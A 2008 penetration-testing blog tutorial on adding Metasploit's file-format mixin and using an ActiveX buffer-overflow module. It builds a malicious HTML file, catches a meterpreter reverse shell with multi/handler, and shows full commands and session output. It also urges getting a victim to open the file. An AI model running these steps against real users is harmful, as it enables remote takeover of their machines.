Saturday, August 23, 2008

Metasploit and File Format Bugs


Client-side attacks are where it's at, and being able to send a legitimate-looking file to a user to do their double-clicky thing on is the bomb.

MC has released a FileFormat mixin for Metasploit that lets you exploit fun bugs like 08-011 and other bugs that involve a user opening some sort of attachment.

Here is the link to the fileformat mixin:
http://www.metasploit.com/users/mc/rand/fileformat.rb

To use it, you need to add:

require 'msf/core/exploit/fileformat'

to msf3/lib/msf/core/exploit.rb, and stick fileformat.rb in the msf3/lib/msf/core/exploit/ directory.

Put the require at the bottom of exploit.rb with the other mixin requires, not at the top of the file. fileformat.rb reopens Msf::Exploit to add the mixin, so if it gets loaded before that class is defined, msfconsole dies at startup with "uninitialized constant Msf::Exploit (NameError)" pointing at line 3 of fileformat.rb.

Now, remembering my previous post on adding exploits to Metasploit, we can do the same for mixins and keep them under ~/.msf3.

So my exploit.rb file actually said:

require '/home/cg/.msf3/lib/msf/core/exploit/fileformat'

And don't worry, if you jacked something up Metasploit will let you know at startup:

cg@WPAD:~/evil/msf3$ ./msfconsole
./lib/msf/core/exploit.rb:241:in `require': no such file to load -- /home/cg/.msf3/lib/msf/core/exploit/fileformat (LoadError)
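Why the require has to come after the class it extends, as an added example (my own stand-in code, not MC's fileformat.rb and not framework code): the real mixin opens `module Exploit::FileFormat` inside `module Msf`, which only resolves once Msf::Exploit already exists. The two snippets below are assumptions that keep just that shape; `load_in_order` evaluates them in a throwaway namespace so each run starts from a clean constant table, and reproduces the "uninitialized constant Msf::Exploit" NameError people hit when the require goes at the top of exploit.rb.

```ruby
# Added example, not MC's mixin or Metasploit code. Reproduces the
# load-order failure behind "uninitialized constant Msf::Exploit (NameError)".
# EXPLOIT_RB and FILEFORMAT_RB are stand-ins (assumptions) for the two
# real files, reduced to the lines that matter for constant resolution.

EXPLOIT_RB = <<~RUBY
  module Msf
    class Exploit
      # the real exploit.rb defines the exploit base class here
    end
  end
RUBY

FILEFORMAT_RB = <<~RUBY
  module Msf
    module Exploit::FileFormat   # line 3 of the real mixin has this shape
      def file_create(data); end
    end
  end
RUBY

# Evaluate the snippets in the given order inside a fresh anonymous module,
# so `module Msf` lands under that sandbox instead of the top level and the
# two orderings don't contaminate each other. Returns :loaded on success or
# the NameError message Ruby would print at msfconsole startup.
def load_in_order(*snippets)
  sandbox = Module.new
  snippets.each { |code| sandbox.module_eval(code) }
  :loaded
rescue NameError => e
  e.message
end

if __FILE__ == $0
  puts "require at the bottom of exploit.rb: #{load_in_order(EXPLOIT_RB, FILEFORMAT_RB)}"
  puts "require at the top of exploit.rb:    #{load_in_order(FILEFORMAT_RB, EXPLOIT_RB)}"
end
```

The first ordering is what a require at the end of exploit.rb gives you; the second is what the commenters below did and matches their trace (exploit.rb:1 or :2 in `require`, failing at fileformat.rb:3).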


For our example we'll use a vulnerability in the ActiveX control for eTrust PestScan:
http://www.metasploit.com/users/mc/rand/etrust_pestscan.rb


From the description in the module:

This module exploits a stack overflow in CA eTrust PestPatrol. When sending an overly long string to the Initialize() property of ppctl.dll (5.6.7.9) an attacker may be able to execute arbitrary code. This control is not marked safe for scripting, so choose your attack vector accordingly.

Example Time!

msf > use exploit/windows/fileformat/etrust_pestscan
msf exploit(etrust_pestscan) > info

       Name: CA eTrust PestPatrol ActiveX Control Buffer Overflow
    Version: $Revision:$
   Platform: Windows
 Privileged: No
    License: Metasploit Framework License

Provided by:
  MC

Available targets:
  Id  Name
  --  ----
  0   Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7

Basic options:
  Name      Current Setting  Required  Description
  ----      ---------------  --------  -----------
  FILENAME  MSF              no        The file name.

Payload information:
  Space: 1024
  Avoid: 1 characters

Description:
  This module exploits a stack overflow in CA eTrust PestPatrol. When
  sending an overly long string to the Initialize() property of
  ppctl.dll (5.6.7.9) an attacker may be able to execute arbitrary
  code. This control is not marked safe for scripting, so choose your
  attack vector accordingly.

References:
  http://www.w00t-shell.net/#
  http://www.my-etrust.com/Extern/RoadRunner/PestScan/scan.htm

msf exploit(etrust_pestscan) > show options

Module options:

  Name      Current Setting  Required  Description
  ----      ---------------  --------  -----------
  FILENAME  MSF              no        The file name.

Exploit target:

  Id  Name
  --  ----
  0   Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7

msf exploit(etrust_pestscan) > set FILENAME DEMO.html
FILENAME => DEMO.html
msf exploit(etrust_pestscan) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(etrust_pestscan) > set LHOST 192.168.0.101
LHOST => 192.168.0.101
msf exploit(etrust_pestscan) > show options

Module options:

  Name      Current Setting  Required  Description
  ----      ---------------  --------  -----------
  FILENAME  DEMO.html        no        The file name.

Payload options (windows/meterpreter/reverse_tcp):

  Name      Current Setting                                  Required  Description
  ----      ---------------                                  --------  -----------
  DLL       /home/cg/evil/msf3/data/meterpreter/metsrv.dll   yes       The local path to the DLL to upload
  EXITFUNC  process                                          yes       Exit technique: seh, thread, process
  LHOST     192.168.0.101                                    yes       The local address
  LPORT     4444                                             yes       The local port

Exploit target:

  Id  Name
  --  ----
  0   Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7

msf exploit(etrust_pestscan) > exploit
[*] Started reverse handler
[*] Creating HTML file ...
[*] File is located in ./data/exploits/ ...
msf exploit(etrust_pestscan) >
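What the mixin is doing for you in that run, as an added example (my own stand-in code, not MC's fileformat.rb and not anything from the framework): a fileformat module only has to build the bytes, and the mixin takes FILENAME from the datastore and writes them out under a data/exploits directory. The class and method names, the OUTDIR option, the output directory and the placeholder HTML body are all assumptions made for this example. The one check I added that the page does not describe is reducing FILENAME to a bare basename and whitelisting its characters, because it is operator input that becomes part of a filesystem path.

```ruby
require 'fileutils'
require 'tmpdir'

# Added example: a minimal stand-in for the FileFormat mixin pattern, not
# MC's fileformat.rb and not framework code. Class/method names, OUTDIR,
# OUTPUT_DIR and the placeholder HTML are assumptions made for this example.
module Msf
  class Exploit
    attr_reader :datastore

    def initialize(datastore = {})
      # Same default the real module shows in `show options`: FILENAME => MSF
      @datastore = { 'FILENAME' => 'MSF' }.merge(datastore)
    end

    def print_status(msg)
      puts "[*] #{msg}"
    end
  end

  # Defined after Msf::Exploit exists, which is the whole load-order point:
  # `module Exploit::FileFormat` reopens the class it extends.
  module Exploit::FileFormat
    OUTPUT_DIR = File.join(Dir.tmpdir, 'msf-example', 'data', 'exploits')

    # Writes +data+ to <outdir>/<FILENAME> and returns the path written.
    def file_create(data)
      fname = File.basename(datastore['FILENAME'].to_s)
      # FILENAME is operator input that ends up in a path. basename strips
      # any "../../" prefix; the whitelist rejects what is left over that we
      # never want in a generated file name (empty, ".", "..", backslashes).
      unless fname =~ /\A[\w.\-]+\z/ && !%w[. ..].include?(fname)
        raise ArgumentError, "refusing to use FILENAME #{datastore['FILENAME'].inspect}"
      end
      outdir = datastore.fetch('OUTDIR', OUTPUT_DIR)
      FileUtils.mkdir_p(outdir)
      path = File.join(outdir, fname)
      File.binwrite(path, data)
      print_status("File is located in #{path} ...")
      path
    end
  end
end

# Stand-in for a fileformat exploit module: it builds the bytes and hands
# them to the mixin. The body is a placeholder comment, not an exploit.
class DemoFileFormat < Msf::Exploit
  include Msf::Exploit::FileFormat

  def html
    "<html><body><!-- trigger goes here --></body></html>\n"
  end

  def exploit
    print_status('Creating HTML file ...')
    file_create(html)
  end
end

# Mirrors `set FILENAME ...` followed by `exploit`; returns the written path.
def generate(filename, outdir)
  DemoFileFormat.new({ 'FILENAME' => filename, 'OUTDIR' => outdir }).exploit
end

if __FILE__ == $0
  generate('DEMO.html', Dir.mktmpdir)
end
```

Note that File.basename only understands backslashes as separators on Windows, which is why the whitelist exists as well: on Linux a FILENAME of `..\..\x.html` is a single basename containing backslashes, and the regex rejects it.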


File format bugs require you to run exploit/multi/handler separately so you can catch the returning shells: the exploit module only writes the file and hands you back the prompt, it doesn't sit around waiting for the victim. Start the handler with the same PAYLOAD, LHOST and LPORT you generated the file with.

cg@WPAD:~/evil/msf3$ ./msfcli

Usage: ./msfcli [mode]
====================================================

  Mode           Description
  ----           -----------
  (H)elp         You're looking at it baby!
  (S)ummary      Show information about this module
  (O)ptions      Show available options for this module
  (A)dvanced     Show available advanced options for this module
  (I)DS Evasion  Show available ids evasion options for this module
  (P)ayloads     Show available payloads for this module
  (T)argets      Show available targets for this exploit module
  (AC)tions      Show available actions for this auxiliary module
  (C)heck        Run the check routine of the selected module
  (E)xecute      Execute the selected module


cg@WPAD:~/evil/msf3$ ./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LPORT=4444 LHOST=192.168.0.101 E
[*] Started reverse handler
[*] Starting the payload handler...


***Work your magic to get the client to open the html file***

[*] Transmitting intermediate stager for over-sized stage...(89 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (73227 bytes)...
[*] Upload completed.
[*] Meterpreter session 1 opened (192.168.0.101:4444 -> 192.168.0.103:4360)

meterpreter >

CG

8 comments:

Unknown said...

Hi, CG! Happy New Year to you!!
After adding require 'msf/core/exploit/fileformat' to msf3/lib/msf/core/exploit.rb, Metasploit can not start up. Please help me!

CG said...

can you paste what errors you are getting?

Unknown said...

I have found a solution! Thx

Unknown said...

Hi, CG! Thank you very much for your quick response!! I have found a solution on your website!

Anonymous said...

Hello guys,

I have the same problem. msfconsole won't start anymore after adding the "require" line in exploit.rb.

I'm using Backtrack 3 and metasploit 3.2.
I'm not familiar with Ruby. Can you help me?

bt framework-3.2 # ./msfconsole
/pentest/exploits/framework-3.2/lib/msf/core/exploit/fileformat.rb:3: uninitialized constant Msf::Exploit (NameError)
from /pentest/exploits/framework-3.2/lib/msf/core/exploit.rb:1:in `require'
from /pentest/exploits/framework-3.2/lib/msf/core/exploit.rb:1
from /pentest/exploits/framework-3.2/lib/msf/core.rb:48:in `require'
from /pentest/exploits/framework-3.2/lib/msf/core.rb:48
from /pentest/exploits/framework-3.2/lib/msf/ui/console/driver.rb:1:in `require'
from /pentest/exploits/framework-3.2/lib/msf/ui/console/driver.rb:1
from /pentest/exploits/framework-3.2/lib/msf/ui/console.rb:10:in `require'
from /pentest/exploits/framework-3.2/lib/msf/ui/console.rb:10
from /pentest/exploits/framework-3.2/lib/msf/ui.rb:10:in `require'
from /pentest/exploits/framework-3.2/lib/msf/ui.rb:10
from ./msfconsole:12:in `require'
from ./msfconsole:12


Best regards,
Jerome (email: marc@wallaby.be)

CG said...

did you install the actual mixin?

Anonymous said...

Hello everyone,

After a tiny mail from Chris, my problem has been fixed by using msf 3.3dev. Thank you Chris !

Regards,
Jerome

Anonymous said...

Hi, I'm trying to install the adobe_utilprintf.rb exploit in Metasploit 3.2. I open the .msf3/modules folder and create the exploits\windows\fileformat path. Inside the fileformat folder I save the adobe_utilprintf.rb file. Then I edit exploit.rb and add, after the require 'msf/core' line, the command
require 'msf/core/exploit/fileformat'. I add the fileformat.rb file in the msf32\lib\msf\core\exploit folder. When I run it I get the following error:
C:/Documents and Settings/Giorgos/Application Data/msf32/lib/msf/core/exploit/fileformat.rb:3: uninitialized constant Msf::Exploit (NameError)
from C:/Documents and Settings/Giorgos/Application Data/msf32/lib/msf/core/exploit.rb:2:in `require'
from C:/Documents and Settings/Giorgos/Application Data/msf32/lib/msf/core/exploit.rb:2
from C:/Documents and Settings/Giorgos/Application Data/msf32/lib/msf/core.rb:48:in `require'
from C:/Documents and Settings/Giorgos/Application Data/msf32/lib/msf/core.rb:48
from C:/Documents and Settings/Giorgos/Application Data/msf32/lib/msf/base.rb:19:in `require'
from C:/Documents and Settings/Giorgos/Application Data/msf32/lib/msf/base.rb:19
from C:\Documents and Settings\Giorgos\Application Data/msf32/msfgui:11:in `require'
from C:\Documents and Settings\Giorgos\Application Data/msf32/msfgui:11
from C:/Program Files/Metasploit/Framework3/bin/launcher.rb:97:in `load'
from C:/Program Files/Metasploit/Framework3/bin/launcher.rb:97

and Metasploit doesn't load. How can I fix this?